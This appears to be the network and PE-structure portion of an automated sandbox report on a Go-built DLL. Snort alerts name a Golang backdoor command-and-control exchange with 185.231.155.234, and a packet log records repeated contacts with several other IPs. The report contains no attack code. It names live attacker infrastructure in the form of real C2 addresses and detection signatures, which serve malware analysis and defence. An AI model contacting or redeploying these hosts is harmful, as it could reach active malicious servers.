.edata	0x801000	0x61	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.idata	0x802000	0x9c0	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.CRT	0x803000	0x2c	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x804000	0x8	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata0	0x805000	0x68a332	0x0	d41d8cd98f00b204e9800998ecf8427e	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata1	0xe90000	0x2c	0x200	0a91ad87cd345cc059e0ce3bc5667d43	False	0.04296875	data	0.14263576814887827	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata2	0xe91000	0xd32970	0xd32a00	74a53f560fcb613b34d713b8430dde26	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.reloc	0x1bc4000	0x43c	0x600	a8b5e214483e05d9e45a726c056304e5	False	0.4016927083333333	data	3.4674879728835952	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL	Import
KERNEL32.dll	AddVectoredExceptionHandler
msvcrt.dll	__mb_cur_max

Exports

Name	Ordinal	Address
MainFunc	1	0x6c7a6460
_cgo_dummy_export	2	0x6cabf64c

Network Behavior

Download Network PCAP: filtered – full

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
07/15/24-12:52:56.229033	TCP	2855536	ETPRO TROJAN Unknown Golang Backdoor CnC Client Request M1	49770	20529	192.168.2.5	185.231.155.234
07/15/24-12:53:25.827998	TCP	2855538	ETPRO TROJAN Unknown Golang Backdoor CnC Server Response M1	20529	49770	185.231.155.234	192.168.2.5
07/15/24-12:52:56.228835	TCP	2855539	ETPRO TROJAN Unknown Golang Backdoor CnC Server Response M2	20529	49770	185.231.155.234	192.168.2.5
07/15/24-12:53:25.610445	TCP	2855537	ETPRO TROJAN Unknown Golang Backdoor CnC Client Request M2	49770	20529	192.168.2.5	185.231.155.234

Network Port Distribution

Total Packets: 365
• 20529 undefined
• 80 (HTTP)

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 15, 2024 12:50:54.643198013 CEST	49707	80	192.168.2.5	195.2.70.38
Jul 15, 2024 12:50:54.648312092 CEST	80	49707	195.2.70.38	192.168.2.5
Jul 15, 2024 12:50:54.648411989 CEST	49707	80	192.168.2.5	195.2.70.38
Jul 15, 2024 12:50:54.649132967 CEST	49707	80	192.168.2.5	195.2.70.38
Jul 15, 2024 12:50:54.653975010 CEST	80	49707	195.2.70.38	192.168.2.5
Jul 15, 2024 12:50:54.918894053 CEST	49708	80	192.168.2.5	195.2.70.38
Jul 15, 2024 12:50:55.803812981 CEST	80	49708	195.2.70.38	192.168.2.5
Jul 15, 2024 12:50:55.803927898 CEST	49708	80	192.168.2.5	195.2.70.38
Jul 15, 2024 12:50:55.833787918 CEST	49708	80	192.168.2.5	195.2.70.38
Jul 15, 2024 12:50:55.839628935 CEST	80	49708	195.2.70.38	192.168.2.5
Jul 15, 2024 12:50:56.400330067 CEST	80	49707	195.2.70.38	192.168.2.5
Jul 15, 2024 12:50:56.400409937 CEST	49707	80	192.168.2.5	195.2.70.38
Jul 15, 2024 12:50:56.405544996 CEST	49707	80	192.168.2.5	195.2.70.38
Jul 15, 2024 12:50:56.406368017 CEST	49709	80	192.168.2.5	91.142.74.28
Jul 15, 2024 12:50:56.410697937 CEST	80	49707	195.2.70.38	192.168.2.5
Jul 15, 2024 12:50:56.411561012 CEST	80	49709	91.142.74.28	192.168.2.5
Jul 15, 2024 12:50:56.411792040 CEST	49709	80	192.168.2.5	91.142.74.28
Jul 15, 2024 12:50:56.412877083 CEST	49709	80	192.168.2.5	91.142.74.28
Jul 15, 2024 12:50:56.419964075 CEST	80	49709	91.142.74.28	192.168.2.5
Jul 15, 2024 12:50:57.536612988 CEST	80	49708	195.2.70.38	192.168.2.5
Jul 15, 2024 12:50:57.536683083 CEST	49708	80	192.168.2.5	195.2.70.38
Jul 15, 2024 12:50:57.536834955 CEST	49708	80	192.168.2.5	195.2.70.38
Jul 15, 2024 12:50:57.538947105 CEST	49710	80	192.168.2.5	91.142.74.28
Jul 15, 2024 12:50:57.541824102 CEST	80	49708	195.2.70.38	192.168.2.5
Jul 15, 2024 12:50:57.543942928 CEST	80	49710	91.142.74.28	192.168.2.5
Jul 15, 2024 12:50:57.544014931 CEST	49710	80	192.168.2.5	91.142.74.28
Jul 15, 2024 12:50:57.545780897 CEST	49710	80	192.168.2.5	91.142.74.28
Jul 15, 2024 12:50:57.550724983 CEST	80	49710	91.142.74.28	192.168.2.5
Jul 15, 2024 12:50:58.148911953 CEST	80	49709	91.142.74.28	192.168.2.5
Jul 15, 2024 12:50:58.149007082 CEST	49709	80	192.168.2.5	91.142.74.28
Jul 15, 2024 12:50:58.149137974 CEST	49709	80	192.168.2.5	91.142.74.28
Jul 15, 2024 12:50:58.152705908 CEST	49711	80	192.168.2.5	77.238.224.56
Jul 15, 2024 12:50:58.157793045 CEST	80	49709	91.142.74.28	192.168.2.5
Jul 15, 2024 12:50:58.159037113 CEST	80	49711	77.238.224.56	192.168.2.5
Jul 15, 2024 12:50:58.159105062 CEST	49711	80	192.168.2.5	77.238.224.56
Jul 15, 2024 12:50:58.163238049 CEST	49711	80	192.168.2.5	77.238.224.56
Jul 15, 2024 12:50:58.170074940 CEST	80	49711	77.238.224.56	192.168.2.5
Jul 15, 2024 12:50:59.290182114 CEST	80	49710	91.142.74.28	192.168.2.5
Jul 15, 2024 12:50:59.290498972 CEST	49710	80	192.168.2.5	91.142.74.28
Jul 15, 2024 12:50:59.361953020 CEST	49710	80	192.168.2.5	91.142.74.28
Jul 15, 2024 12:50:59.367721081 CEST	80	49710	91.142.74.28	192.168.2.5
Jul 15, 2024 12:50:59.377120972 CEST	49712	80	192.168.2.5	77.238.224.56
Jul 15, 2024 12:50:59.382931948 CEST	80	49712	77.238.224.56	192.168.2.5
Jul 15, 2024 12:50:59.383033991 CEST	49712	80	192.168.2.5	77.238.224.56
Jul 15, 2024 12:50:59.386687040 CEST	49712	80	192.168.2.5	77.238.224.56
Jul 15, 2024 12:50:59.392844915 CEST	80	49712	77.238.224.56	192.168.2.5
Jul 15, 2024 12:50:59.777601957 CEST	80	49711	77.238.224.56	192.168.2.5
Jul 15, 2024 12:50:59.777736902 CEST	49711	80	192.168.2.5	77.238.224.56
Jul 15, 2024 12:50:59.777833939 CEST	49711	80	192.168.2.5	77.238.224.56
Jul 15, 2024 12:50:59.778536081 CEST	49713	80	192.168.2.5	77.238.229.63
Jul 15, 2024 12:50:59.783101082 CEST	80	49711	77.238.224.56	192.168.2.5
Jul 15, 2024 12:50:59.783796072 CEST	80	49713	77.238.229.63	192.168.2.5
Jul 15, 2024 12:50:59.784020901 CEST	49713	80	192.168.2.5	77.238.229.63
Jul 15, 2024 12:50:59.785394907 CEST	49713	80	192.168.2.5	77.238.229.63
Jul 15, 2024 12:50:59.790553093 CEST	80	49713	77.238.229.63	192.168.2.5
Jul 15, 2024 12:51:01.012686968 CEST	80	49712	77.238.224.56	192.168.2.5
Jul 15, 2024 12:51:01.012777090 CEST	49712	80	192.168.2.5	77.238.224.56
Jul 15, 2024 12:51:01.034713984 CEST	49712	80	192.168.2.5	77.238.224.56
Jul 15, 2024 12:51:01.040219069 CEST	80	49712	77.238.224.56	192.168.2.5
Jul 15, 2024 12:51:01.071077108 CEST	49714	80	192.168.2.5	77.238.229.63
Jul 15, 2024 12:51:01.077691078 CEST	80	49714	77.238.229.63	192.168.2.5
Jul 15, 2024 12:51:01.077979088 CEST	49714	80	192.168.2.5	77.238.229.63
Jul 15, 2024 12:51:01.167155981 CEST	49714	80	192.168.2.5	77.238.229.63
Jul 15, 2024 12:51:01.172665119 CEST	80	49714	77.238.229.63	192.168.2.5
Jul 15, 2024 12:51:01.446079016 CEST	80	49713	77.238.229.63	192.168.2.5
Jul 15, 2024 12:51:01.446299076 CEST	49713	80	192.168.2.5	77.238.229.63
Jul 15, 2024 12:51:01.500559092 CEST	49713	80	192.168.2.5	77.238.229.63
Jul 15, 2024 12:51:01.506325960 CEST	80	49713	77.238.229.63	192.168.2.5
Jul 15, 2024 12:51:01.676664114 CEST	49715	80	192.168.2.5	77.238.250.123
Jul 15, 2024 12:51:01.682145119 CEST	80	49715	77.238.250.123	192.168.2.5
Jul 15, 2024 12:51:01.682250977 CEST	49715	80	192.168.2.5	77.238.250.123
Jul 15, 2024 12:51:01.896954060 CEST	49715	80	192.168.2.5	77.238.250.123
Jul 15, 2024 12:51:01.902786016 CEST	80	49715	77.238.250.123	192.168.2.5
Jul 15, 2024 12:51:02.290771008 CEST	80	49715	77.238.250.123	192.168.2.5
Jul 15, 2024 12:51:02.413295984 CEST	49715	80	192.168.2.5	77.238.250.123
Jul 15, 2024 12:51:02.429044008 CEST	49715	80	192.168.2.5	77.238.250.123
Jul 15, 2024 12:51:02.435724974 CEST	80	49715	77.238.250.123	192.168.2.5
Jul 15, 2024 12:51:02.435807943 CEST	49715	80	192.168.2.5	77.238.250.123
Jul 15, 2024 12:51:02.718336105 CEST	80	49714	77.238.229.63	192.168.2.5
Jul 15, 2024 12:51:02.718583107 CEST	49714	80	192.168.2.5	77.238.229.63
Jul 15, 2024 12:51:02.726763010 CEST	49714	80	192.168.2.5	77.238.229.63
Jul 15, 2024 12:51:02.732280970 CEST	80	49714	77.238.229.63	192.168.2.5
Jul 15, 2024 12:51:02.765053988 CEST	49716	80	192.168.2.5	77.238.250.123
Jul 15, 2024 12:51:02.770865917 CEST	80	49716	77.238.250.123	192.168.2.5
Jul 15, 2024 12:51:02.771042109 CEST	49716	80	192.168.2.5	77.238.250.123
Jul 15, 2024 12:51:02.844525099 CEST	49716	80	192.168.2.5	77.238.250.123
Jul 15, 2024 12:51:02.850358009 CEST	80	49716	77.238.250.123	192.168.2.5
Jul 15, 2024 12:51:03.391365051 CEST	80	49716	77.238.250.123	192.168.2.5
Jul 15, 2024 12:51:03.446924925 CEST	49716	80	192.168.2.5	77.238.250.123
Jul 15, 2024 12:51:03.452682018 CEST	80	49716	77.238.250.123	192.168.2.5
Jul 15, 2024 12:51:03.452914953 CEST	49716	80	192.168.2.5	77.238.250.123
Jul 15, 2024 12:51:03.958420992 CEST	49717	80	192.168.2.5	195.2.70.38
Jul 15, 2024 12:51:03.964102983 CEST	80	49717	195.2.70.38	192.168.2.5
Jul 15, 2024 12:51:03.964195013 CEST	49717	80	192.168.2.5	195.2.70.38
Jul 15, 2024 12:51:03.965400934 CEST	49717	80	192.168.2.5	195.2.70.38
Jul 15, 2024 12:51:03.971218109 CEST	80	49717	195.2.70.38	192.168.2.5
Jul 15, 2024 12:51:05.697370052 CEST	80	49717	195.2.70.38	192.168.2.5
Jul 15, 2024 12:51:05.697608948 CEST	49717	80	192.168.2.5	195.2.70.38
Jul 15, 2024 12:51:05.697608948 CEST	49717	80	192.168.2.5	195.2.70.38
Jul 15, 2024 12:51:05.698625088 CEST	49718	80	192.168.2.5	91.142.74.28
Jul 15, 2024 12:51:05.705413103 CEST	80	49717	195.2.70.38	192.168.2.5
Jul 15, 2024 12:51:05.705753088 CEST	80	49718	91.142.74.28	192.168.2.5
Jul 15, 2024 12:51:05.705951929 CEST	49718	80	192.168.2.5	91.142.74.28
Jul 15, 2024 12:51:05.709209919 CEST	49718	80	192.168.2.5	91.142.74.28
Jul 15, 2024 12:51:05.714330912 CEST	80	49718	91.142.74.28	192.168.2.5
Jul 15, 2024 12:51:07.446747065 CEST	80	49718	91.142.74.28	192.168.2.5
Jul 15, 2024 12:51:07.446933985 CEST	49718	80	192.168.2.5	91.142.74.28
Jul 15, 2024 12:51:07.447038889 CEST	49718	80	192.168.2.5	91.142.74.28
Jul 15, 2024 12:51:07.448067904 CEST	49722	80	192.168.2.5	77.238.224.56
Jul 15, 2024 12:51:07.452370882 CEST	80	49718	91.142.74.28	192.168.2.5
Jul 15, 2024 12:51:07.453409910 CEST	80	49722	77.238.224.56	192.168.2.5
Jul 15, 2024 12:51:07.453488111 CEST	49722	80	192.168.2.5	77.238.224.56
Jul 15, 2024 12:51:07.453811884 CEST	49722	80	192.168.2.5	77.238.224.56
Jul 15, 2024 12:51:07.459012985 CEST	80	49722	77.238.224.56	192.168.2.5
Jul 15, 2024 12:51:09.073873997 CEST	80	49722	77.238.224.56	192.168.2.5
Jul 15, 2024 12:51:09.074162960 CEST	49722	80	192.168.2.5	77.238.224.56
Jul 15, 2024 12:51:09.074295998 CEST	49722	80	192.168.2.5	77.238.224.56
Jul 15, 2024 12:51:09.076690912 CEST	49725	80	192.168.2.5	77.238.229.63
Jul 15, 2024 12:51:09.079606056 CEST	80	49722	77.238.224.56	192.168.2.5
Jul 15, 2024 12:51:09.082149029 CEST	80	49725	77.238.229.63	192.168.2.5
Jul 15, 2024 12:51:09.082387924 CEST	49725	80	192.168.2.5	77.238.229.63
Jul 15, 2024 12:51:09.083657026 CEST	49725	80	192.168.2.5	77.238.229.63
Jul 15, 2024 12:51:09.089061975 CEST	80	49725	77.238.229.63	192.168.2.5
Jul 15, 2024 12:51:10.698513031 CEST	80	49725	77.238.229.63	192.168.2.5
Jul 15, 2024 12:51:10.698885918 CEST	49725	80	192.168.2.5	77.238.229.63
Jul 15, 2024 12:51:10.698887110 CEST	49725	80	192.168.2.5	77.238.229.63
Jul 15, 2024 12:51:10.699791908 CEST	49727	80	192.168.2.5	77.238.250.123
Jul 15, 2024 12:51:10.704222918 CEST	80	49725	77.238.229.63	192.168.2.5
Jul 15, 2024 12:51:10.705358982 CEST	80	49727	77.238.250.123	192.168.2.5
Jul 15, 2024 12:51:10.705442905 CEST	49727	80	192.168.2.5	77.238.250.123
Jul 15, 2024 12:51:10.705878973 CEST	49727	80	192.168.2.5	77.238.250.123
Jul 15, 2024 12:51:10.711189985 CEST	80	49727	77.238.250.123	192.168.2.5
Jul 15, 2024 12:51:11.313143015 CEST	80	49727	77.238.250.123	192.168.2.5
Jul 15, 2024 12:51:11.313622952 CEST	49727	80	192.168.2.5	77.238.250.123
Jul 15, 2024 12:51:11.319008112 CEST	80	49727	77.238.250.123	192.168.2.5
Jul 15, 2024 12:51:11.319082975 CEST	49727	80	192.168.2.5	77.238.250.123
Jul 15, 2024 12:51:32.491449118 CEST	49728	80	192.168.2.5	195.2.70.38
Jul 15, 2024 12:51:32.497370005 CEST	80	49728	195.2.70.38	192.168.2.5
Jul 15, 2024 12:51:32.497529030 CEST	49728	80	192.168.2.5	195.2.70.38
Jul 15, 2024 12:51:32.497910023 CEST	49728	80	192.168.2.5	195.2.70.38
Jul 15, 2024 12:51:32.502690077 CEST	80	49728	195.2.70.38	192.168.2.5
Jul 15, 2024 12:51:33.542928934 CEST	49729	80	192.168.2.5	195.2.70.38
Jul 15, 2024 12:51:33.549493074 CEST	80	49729	195.2.70.38	192.168.2.5
Jul 15, 2024 12:51:33.549835920 CEST	49729	80	192.168.2.5	195.2.70.38
Jul 15, 2024 12:51:33.587869883 CEST	49729	80	192.168.2.5	195.2.70.38
Jul 15, 2024 12:51:33.592675924 CEST	80	49729	195.2.70.38	192.168.2.5
Jul 15, 2024 12:51:34.245383978 CEST	80	49728	195.2.70.38	192.168.2.5
Jul 15, 2024 12:51:34.247883081 CEST	49728	80	192.168.2.5	195.2.70.38
Jul 15, 2024 12:51:34.247957945 CEST	49728	80	192.168.2.5	195.2.70.38
Jul 15, 2024 12:51:34.249589920 CEST	49730	80	192.168.2.5	91.142.74.28
Jul 15, 2024 12:51:34.253782034 CEST	80	49728	195.2.70.38	192.168.2.5
Jul 15, 2024 12:51:34.255311012 CEST	80	49730	91.142.74.28	192.168.2.5
Jul 15, 2024 12:51:34.255505085 CEST	49730	80	192.168.2.5	91.142.74.28
Jul 15, 2024 12:51:34.255948067 CEST	49730	80	192.168.2.5	91.142.74.28
Jul 15, 2024 12:51:34.260799885 CEST	80	49730	91.142.74.28	192.168.2.5
Jul 15, 2024 12:51:35.286840916 CEST	80	49729	195.2.70.38	192.168.2.5
Jul 15, 2024 12:51:35.286900997 CEST	49729	80	192.168.2.5	195.2.70.38
Jul 15, 2024 12:51:35.287086010 CEST	49729	80	192.168.2.5	195.2.70.38
Jul 15, 2024 12:51:35.287883043 CEST	49731	80	192.168.2.5	91.142.74.28
Jul 15, 2024 12:51:35.291786909 CEST	80	49729	195.2.70.38	192.168.2.5
Jul 15, 2024 12:51:35.292722940 CEST	80	49731	91.142.74.28	192.168.2.5
Jul 15, 2024 12:51:35.292788982 CEST	49731	80	192.168.2.5	91.142.74.28
Jul 15, 2024 12:51:35.293457985 CEST	49731	80	192.168.2.5	91.142.74.28
Jul 15, 2024 12:51:35.298229933 CEST	80	49731	91.142.74.28	192.168.2.5
Jul 15, 2024 12:51:35.991467953 CEST	80	49730	91.142.74.28	192.168.2.5
Jul 15, 2024 12:51:35.991523981 CEST	49730	80	192.168.2.5	91.142.74.28
Jul 15, 2024 12:51:35.996669054 CEST	49730	80	192.168.2.5	91.142.74.28
Jul 15, 2024 12:51:36.001493931 CEST	80	49730	91.142.74.28	192.168.2.5
Jul 15, 2024 12:51:36.007390976 CEST	49732	80	192.168.2.5	77.238.224.56
Jul 15, 2024 12:51:36.012617111 CEST	80	49732	77.238.224.56	192.168.2.5
Jul 15, 2024 12:51:36.012707949 CEST	49732	80	192.168.2.5	77.238.224.56
Jul 15, 2024 12:51:36.043051958 CEST	49732	80	192.168.2.5	77.238.224.56
Jul 15, 2024 12:51:36.082089901 CEST	80	49732	77.238.224.56	192.168.2.5
Jul 15, 2024 12:51:37.040731907 CEST	80	49731	91.142.74.28	192.168.2.5
Jul 15, 2024 12:51:37.040821075 CEST	49731	80	192.168.2.5	91.142.74.28
Jul 15, 2024 12:51:37.040901899 CEST	49731	80	192.168.2.5	91.142.74.28
Jul 15, 2024 12:51:37.041810036 CEST	49733	80	192.168.2.5	77.238.224.56
Jul 15, 2024 12:51:37.046082973 CEST	80	49731	91.142.74.28	192.168.2.5
Jul 15, 2024 12:51:37.046962023 CEST	80	49733	77.238.224.56	192.168.2.5
Jul 15, 2024 12:51:37.047065973 CEST	49733	80	192.168.2.5	77.238.224.56
Jul 15, 2024 12:51:37.048932076 CEST	49733	80	192.168.2.5	77.238.224.56
Jul 15, 2024 12:51:37.054929972 CEST	80	49733	77.238.224.56	192.168.2.5
Jul 15, 2024 12:51:37.621486902 CEST	80	49732	77.238.224.56	192.168.2.5
Jul 15, 2024 12:51:37.621607065 CEST	49732	80	192.168.2.5	77.238.224.56
Jul 15, 2024 12:51:37.621701956 CEST	49732	80	192.168.2.5	77.238.224.56
Jul 15, 2024 12:51:37.622442007 CEST	49734	80	192.168.2.5	77.238.229.63
Jul 15, 2024 12:51:37.626869917 CEST	80	49732	77.238.224.56	192.168.2.5
Jul 15, 2024 12:51:37.627628088 CEST	80	49734	77.238.229.63	192.168.2.5
Jul 15, 2024 12:51:37.627707958 CEST	49734	80	192.168.2.5	77.238.229.63
Jul 15, 2024 12:51:37.628230095 CEST	49734	80	192.168.2.5	77.238.229.63
Jul 15, 2024 12:51:37.633517027 CEST	80	49734	77.238.229.63	192.168.2.5
Jul 15, 2024 12:51:38.667695999 CEST	80	49733	77.238.224.56	192.168.2.5
Jul 15, 2024 12:51:38.667874098 CEST	49733	80	192.168.2.5	77.238.224.56
Jul 15, 2024 12:51:38.668042898 CEST	49733	80	192.168.2.5	77.238.224.56
Jul 15, 2024 12:51:38.668997049 CEST	49735	80	192.168.2.5	77.238.229.63
Jul 15, 2024 12:51:38.672844887 CEST	80	49733	77.238.224.56	192.168.2.5
Jul 15, 2024 12:51:38.674015999 CEST	80	49735	77.238.229.63	192.168.2.5
Jul 15, 2024 12:51:38.674124956 CEST	49735	80	192.168.2.5	77.238.229.63
Jul 15, 2024 12:51:38.674495935 CEST	49735	80	192.168.2.5	77.238.229.63
Jul 15, 2024 12:51:38.679431915 CEST	80	49735	77.238.229.63	192.168.2.5
Jul 15, 2024 12:51:39.245724916 CEST	80	49734	77.238.229.63	192.168.2.5
Jul 15, 2024 12:51:39.245815992 CEST	49734	80	192.168.2.5	77.238.229.63
Jul 15, 2024 12:51:39.245945930 CEST	49734	80	192.168.2.5	77.238.229.63
Jul 15, 2024 12:51:39.246759892 CEST	49736	80	192.168.2.5	77.238.250.123
Jul 15, 2024 12:51:39.253294945 CEST	80	49734	77.238.229.63	192.168.2.5
Jul 15, 2024 12:51:39.253305912 CEST	80	49736	77.238.250.123	192.168.2.5
Jul 15, 2024 12:51:39.253393888 CEST	49736	80	192.168.2.5	77.238.250.123
Jul 15, 2024 12:51:39.253839016 CEST	49736	80	192.168.2.5	77.238.250.123
Jul 15, 2024 12:51:39.259346962 CEST	80	49736	77.238.250.123	192.168.2.5
Jul 15, 2024 12:51:39.871294022 CEST	80	49736	77.238.250.123	192.168.2.5
Jul 15, 2024 12:51:39.871726036 CEST	49736	80	192.168.2.5	77.238.250.123
Jul 15, 2024 12:51:39.877615929 CEST	80	49736	77.238.250.123	192.168.2.5
Jul 15, 2024 12:51:39.877727985 CEST	49736	80	192.168.2.5	77.238.250.123
Jul 15, 2024 12:51:40.321088076 CEST	80	49735	77.238.229.63	192.168.2.5
Jul 15, 2024 12:51:40.321221113 CEST	49735	80	192.168.2.5	77.238.229.63
Jul 15, 2024 12:51:40.321306944 CEST	49735	80	192.168.2.5	77.238.229.63
Jul 15, 2024 12:51:40.322284937 CEST	49737	80	192.168.2.5	77.238.250.123
Jul 15, 2024 12:51:40.328098059 CEST	80	49735	77.238.229.63	192.168.2.5
Jul 15, 2024 12:51:40.328114033 CEST	80	49737	77.238.250.123	192.168.2.5
Jul 15, 2024 12:51:40.328222036 CEST	49737	80	192.168.2.5	77.238.250.123
Jul 15, 2024 12:51:40.328762054 CEST	49737	80	192.168.2.5	77.238.250.123
Jul 15, 2024 12:51:40.333889008 CEST	80	49737	77.238.250.123	192.168.2.5
Jul 15, 2024 12:51:40.939387083 CEST	80	49737	77.238.250.123	192.168.2.5
Jul 15, 2024 12:51:40.939639091 CEST	49737	80	192.168.2.5	77.238.250.123
Jul 15, 2024 12:51:40.944895029 CEST	80	49737	77.238.250.123	192.168.2.5
Jul 15, 2024 12:51:40.944998026 CEST	49737	80	192.168.2.5	77.238.250.123
Jul 15, 2024 12:51:41.317159891 CEST	49738	80	192.168.2.5	195.2.70.38
Jul 15, 2024 12:51:41.322197914 CEST	80	49738	195.2.70.38	192.168.2.5
Jul 15, 2024 12:51:41.322319984 CEST	49738	80	192.168.2.5	195.2.70.38
Jul 15, 2024 12:51:41.322577953 CEST	49738	80	192.168.2.5	195.2.70.38
Jul 15, 2024 12:51:41.327430964 CEST	80	49738	195.2.70.38	192.168.2.5
Jul 15, 2024 12:51:43.053283930 CEST	80	49738	195.2.70.38	192.168.2.5
Jul 15, 2024 12:51:43.053411961 CEST	49738	80	192.168.2.5	195.2.70.38
Jul 15, 2024 12:51:43.053565025 CEST	49738	80	192.168.2.5	195.2.70.38
Jul 15, 2024 12:51:43.054729939 CEST	49739	80	192.168.2.5	91.142.74.28
Jul 15, 2024 12:51:43.058423042 CEST	80	49738	195.2.70.38	192.168.2.5
Jul 15, 2024 12:51:43.059624910 CEST	80	49739	91.142.74.28	192.168.2.5
Jul 15, 2024 12:51:43.059832096 CEST	49739	80	192.168.2.5	91.142.74.28
Jul 15, 2024 12:51:43.060127974 CEST	49739	80	192.168.2.5	91.142.74.28
Jul 15, 2024 12:51:43.064965963 CEST	80	49739	91.142.74.28	192.168.2.5
Jul 15, 2024 12:51:44.789011955 CEST	80	49739	91.142.74.28	192.168.2.5
Jul 15, 2024 12:51:44.789324999 CEST	49739	80	192.168.2.5	91.142.74.28
Jul 15, 2024 12:51:44.789324999 CEST	49739	80	192.168.2.5	91.142.74.28
Jul 15, 2024 12:51:44.790029049 CEST	49740	80	192.168.2.5	77.238.224.56
Jul 15, 2024 12:51:44.794265985 CEST	80	49739	91.142.74.28	192.168.2.5
Jul 15, 2024 12:51:44.795598030 CEST	80	49740	77.238.224.56	192.168.2.5
Jul 15, 2024 12:51:44.795686960 CEST	49740	80	192.168.2.5	77.238.224.56
Jul 15, 2024 12:51:44.796145916 CEST	49740	80	192.168.2.5	77.238.224.56
Jul 15, 2024 12:51:44.801027060 CEST	80	49740	77.238.224.56	192.168.2.5
Jul 15, 2024 12:51:46.384376049 CEST	80	49740	77.238.224.56	192.168.2.5
Jul 15, 2024 12:51:46.384428024 CEST	49740	80	192.168.2.5	77.238.224.56
Jul 15, 2024 12:51:46.384535074 CEST	49740	80	192.168.2.5	77.238.224.56
Jul 15, 2024 12:51:46.385272980 CEST	49742	80	192.168.2.5	77.238.229.63
Jul 15, 2024 12:51:46.390157938 CEST	80	49740	77.238.224.56	192.168.2.5
Jul 15, 2024 12:51:46.390768051 CEST	80	49742	77.238.229.63	192.168.2.5
Jul 15, 2024 12:51:46.390841961 CEST	49742	80	192.168.2.5	77.238.229.63
Jul 15, 2024 12:51:46.391705036 CEST	49742	80	192.168.2.5	77.238.229.63
Jul 15, 2024 12:51:46.397593975 CEST	80	49742	77.238.229.63	192.168.2.5
Jul 15, 2024 12:51:47.995811939 CEST	80	49742	77.238.229.63	192.168.2.5
Jul 15, 2024 12:51:47.997107983 CEST	49742	80	192.168.2.5	77.238.229.63
Jul 15, 2024 12:51:47.997210979 CEST	49742	80	192.168.2.5	77.238.229.63
Jul 15, 2024 12:51:47.998259068 CEST	49743	80	192.168.2.5	77.238.250.123
Jul 15, 2024 12:51:48.002063990 CEST	80	49742	77.238.229.63	192.168.2.5
Jul 15, 2024 12:51:48.003714085 CEST	80	49743	77.238.250.123	192.168.2.5
Jul 15, 2024 12:51:48.003906965 CEST	49743	80	192.168.2.5	77.238.250.123
Jul 15, 2024 12:51:48.004276037 CEST	49743	80	192.168.2.5	77.238.250.123
Jul 15, 2024 12:51:48.009067059 CEST	80	49743	77.238.250.123	192.168.2.5
Jul 15, 2024 12:51:48.605667114 CEST	80	49743	77.238.250.123	192.168.2.5
Jul 15, 2024 12:51:48.605978966 CEST	49743	80	192.168.2.5	77.238.250.123
Jul 15, 2024 12:51:48.620306969 CEST	80	49743	77.238.250.123	192.168.2.5
Jul 15, 2024 12:51:48.620431900 CEST	49743	80	192.168.2.5	77.238.250.123
Jul 15, 2024 12:52:09.875325918 CEST	49745	80	192.168.2.5	195.2.70.38
Jul 15, 2024 12:52:09.880449057 CEST	80	49745	195.2.70.38	192.168.2.5
Jul 15, 2024 12:52:09.880564928 CEST	49745	80	192.168.2.5	195.2.70.38
Jul 15, 2024 12:52:09.880846977 CEST	49745	80	192.168.2.5	195.2.70.38
Jul 15, 2024 12:52:09.885687113 CEST	80	49745	195.2.70.38	192.168.2.5
Jul 15, 2024 12:52:10.944919109 CEST	49746	80	192.168.2.5	195.2.70.38
Jul 15, 2024 12:52:10.950217962 CEST	80	49746	195.2.70.38	192.168.2.5
Jul 15, 2024 12:52:10.950313091 CEST	49746	80	192.168.2.5	195.2.70.38
Jul 15, 2024 12:52:10.950556993 CEST	49746	80	192.168.2.5	195.2.70.38
Jul 15, 2024 12:52:10.955354929 CEST	80	49746	195.2.70.38	192.168.2.5
Jul 15, 2024 12:52:11.637629986 CEST	80	49745	195.2.70.38	192.168.2.5
Jul 15, 2024 12:52:11.637721062 CEST	49745	80	192.168.2.5	195.2.70.38
Jul 15, 2024 12:52:11.637804985 CEST	49745	80	192.168.2.5	195.2.70.38
Jul 15, 2024 12:52:11.638883114 CEST	49747	80	192.168.2.5	91.142.74.28
Jul 15, 2024 12:52:11.642682076 CEST	80	49745	195.2.70.38	192.168.2.5
Jul 15, 2024 12:52:11.643779039 CEST	80	49747	91.142.74.28	192.168.2.5
Jul 15, 2024 12:52:11.643950939 CEST	49747	80	192.168.2.5	91.142.74.28
Jul 15, 2024 12:52:11.644249916 CEST	49747	80	192.168.2.5	91.142.74.28
Jul 15, 2024 12:52:11.649769068 CEST	80	49747	91.142.74.28	192.168.2.5
Jul 15, 2024 12:52:12.679953098 CEST	80	49746	195.2.70.38	192.168.2.5
Jul 15, 2024 12:52:12.680254936 CEST	49746	80	192.168.2.5	195.2.70.38
Jul 15, 2024 12:52:12.680254936 CEST	49746	80	192.168.2.5	195.2.70.38
Jul 15, 2024 12:52:12.680928946 CEST	49748	80	192.168.2.5	91.142.74.28
Jul 15, 2024 12:52:12.685534954 CEST	80	49746	195.2.70.38	192.168.2.5
Jul 15, 2024 12:52:12.685899973 CEST	80	49748	91.142.74.28	192.168.2.5
Jul 15, 2024 12:52:12.685992956 CEST	49748	80	192.168.2.5	91.142.74.28
Jul 15, 2024 12:52:12.686239958 CEST	49748	80	192.168.2.5	91.142.74.28
Jul 15, 2024 12:52:12.691092968 CEST	80	49748	91.142.74.28	192.168.2.5
Jul 15, 2024 12:52:13.500844002 CEST	80	49747	91.142.74.28	192.168.2.5
